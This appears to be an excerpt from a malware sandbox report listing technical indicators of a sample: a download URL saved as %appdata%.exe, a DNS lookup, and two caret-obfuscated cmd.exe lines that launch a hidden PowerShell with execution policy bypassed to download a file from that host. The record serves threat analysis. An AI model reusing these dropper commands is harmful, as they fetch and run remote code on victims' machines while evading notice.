Technical Information
- http://transporingsytw.wang/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^wERs^h^E^L^l^.^Exe^ ^-eX^E^cutIo^nPOl^icy ^BYPA^SS^ -N^op^RoFiLe ^-w^INd^oWSTylE ^H^i^d^DEn^ ^(n^ew-ob^JE^cT ^SYST^e^m^.nE^t.wEB^ClIeNt).^dOW^nLO^ad^F^I^le^('http://tran...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "PO^wERs^h^E^L^l^.^Exe^ ^-eX^E^cutIo^nPOl^icy ^BYPA^SS^ -N^op^RoFiLe ^-w^INd^oWSTylE ^H^i^d^DEn^ ^(n^ew-ob^JE^cT ^SYST^e^m^.nE^t.wEB^ClIeNt).^dOW^nLO^ad^F^I^le^('http://tran...' (with hidden window)